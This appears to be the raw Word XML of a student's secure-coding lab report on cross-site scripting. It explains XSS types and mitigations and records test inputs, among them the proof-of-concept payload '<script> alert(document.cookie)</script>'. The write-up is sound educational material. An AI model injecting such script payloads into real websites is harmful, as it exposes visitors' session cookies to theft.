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775EE" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2820" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Coding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4133F903" w14:textId="36A60D3F" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5703BA" w14:textId="77777777" w:rsidR="00380BC7" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E4C1DC" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="201"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab-5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ACCBE9" w14:textId="77777777" w:rsidR="00380BC7" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEDB943" w14:textId="7436C83D" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE91CDB" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="38" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304BC0D" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="205" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="213"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39210F7F" w14:textId="77777777" w:rsidR="00380BC7" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="7" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AF04EE" w14:textId="24179E4F" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="7" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CFFDE" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="34" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="73" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0C696" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="852" w:right="937" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Dasari Mohan Amritesh 18BCN7038 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F2149" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CE196" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6F8D5" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74C5D7" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="18" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6A75D" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF881B" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C754E40" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47A9F2" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="18" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F6155" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="93" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55F177" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="33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14:paraId="6B1D382C" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="18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14:paraId="5B00D6EF" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0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14:paraId="4A427ED7" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is XSS? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408ED25" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0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14:paraId="157EABFD" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Scripting(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">XSS) is a security vulnerability found in website and/or web applications that accept user input. Examples of these </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">include search engines, login forms, message boards and comment boxes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798D304" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t>Cybercriminals exploit this vulnerability by inputting strings of executable malicious code into these functions. This injects the malicious code into the targeted website’s content, m</w:t>
      </w:r>
      <w:r>
        <w:t>aking it a part of the website and this allowing it to affect victims who may visit or view this website. The code may also present itself as transient content that isn’t actually a part of the website but only appears to be to the visitor. This makes it l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ook like the website is indeed compromised by cybercriminals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE40C94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53C37895" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="173" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5DED9" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="49" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">How is Secure Coding related to XSS? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72E1D4" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0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054E684C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2C03DCC4" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="51"/>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since XSS attacks happen quite frequently, the use of Secure coding methods </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>help</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in fighting against them. Some of these mitigation techniques incl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ude: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3904AD" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="49"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input Sanitization </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45752089" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="49"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escaping </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E10BF" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="49"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filter input on arrival </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E853538" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67578A45" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="49"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encode data on output </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24606C9C" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="49"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use appropriate response headers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22335399" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Content Security Policy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261ACD88" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="49"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Types of XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B8FAE" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0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06D3E5AC" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="399" w:lineRule="auto"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: </w:t>
      </w:r>
      <w:r>
        <w:t>Input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gets Reflected. Malicious script comes </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from the current HTTP request. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1EBAD9" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="399" w:lineRule="auto"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS: </w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gets stored in the server. Malicious script comes from the website’s database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F2D59F" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="399" w:lineRule="auto"/>
        <w:ind w:right="187" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DOM XSS: </w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is stored in DOM. Vulnerability exists in client-side code rather than server-side code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA16D8" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="158" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B2D65" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="39" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211935C3" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7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14:paraId="5F304AE9" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="61"/>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;u&gt; Amritesh &lt;/u&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB6BB03" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1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4AE451" wp14:editId="3825B445">
                <wp:extent cx="5943600" cy="3381375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3349" name="Group 3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81375"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="3381375"/>
                        </a:xfrm>
                      </wpg:grpSpPr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0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3550"/>
                            <a:ext cx="5943600" cy="1647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9" style="width:468pt;height:266.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,33813">
                <v:shape id="Picture 416" style="position:absolute;width:59436;height:16097;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId7"/>
                </v:shape>
                <v:shape id="Picture 419" style="position:absolute;width:59436;height:16478;left:0;top:17335;" filled="f">
                  <v:imagedata r:id="rId8"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F315149" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="61"/>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; Amritesh &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12082647" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="54" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1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981816D" wp14:editId="184EFB95">
                <wp:extent cx="5943600" cy="3467100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3229" name="Group 3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467100"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="3467100"/>
                        </a:xfrm>
                      </wpg:grpSpPr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0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43075"/>
                            <a:ext cx="5943600" cy="1724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" style="width:468pt;height:273pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,34671">
                <v:shape id="Picture 432" style="position:absolute;width:59436;height:16097;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId11"/>
                </v:shape>
                <v:shape id="Picture 435" style="position:absolute;width:59436;height:17240;left:0;top:17430;" filled="f">
                  <v:imagedata r:id="rId12"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB13394" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7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14:paraId="7214A109" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="61"/>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p style="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>color:red</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">;"&gt;definitely not red&lt;/p&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72C22B" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1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163376" wp14:editId="53C0EF69">
                <wp:extent cx="5943600" cy="3581400"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3230" name="Group 3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581400"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="3581400"/>
                        </a:xfrm>
                      </wpg:grpSpPr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8325"/>
                            <a:ext cx="5943600" cy="1743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0" style="width:468pt;height:282pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,35814">
                <v:shape id="Picture 440" style="position:absolute;width:59436;height:17145;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId15"/>
                </v:shape>
                <v:shape id="Picture 443" style="position:absolute;width:59436;height:17430;left:0;top:18383;" filled="f">
                  <v:imagedata r:id="rId16"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FB4AC" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="https://amritesh-dasari.github.io/"&gt; Amritesh Dasari &lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19132E83" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="44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BAD7C2B" wp14:editId="39813C1D">
                <wp:extent cx="5943600" cy="6648450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3223" name="Group 3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48450"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="6648450"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="460" name="Picture 46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7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00"/>
                            <a:ext cx="5943600" cy="1533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5175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3" style="width:468pt;height:523.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,66484">
                <v:shape id="Picture 460" style="position:absolute;width:59436;height:15716;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId20"/>
                </v:shape>
                <v:shape id="Picture 462" style="position:absolute;width:59436;height:15335;left:0;top:16764;" filled="f">
                  <v:imagedata r:id="rId21"/>
                </v:shape>
                <v:shape id="Picture 465" style="position:absolute;width:59436;height:33432;left:0;top:33051;" filled="f">
                  <v:imagedata r:id="rId22"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC0D2B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6DC1D939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40B75F29" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CA80AF" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC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4B79CC7" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt; alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">)&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23066B04" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="44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DEBEABF" wp14:editId="4E995C6E">
                <wp:extent cx="5943600" cy="5200650"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3546" name="Group 3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00650"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="5200650"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
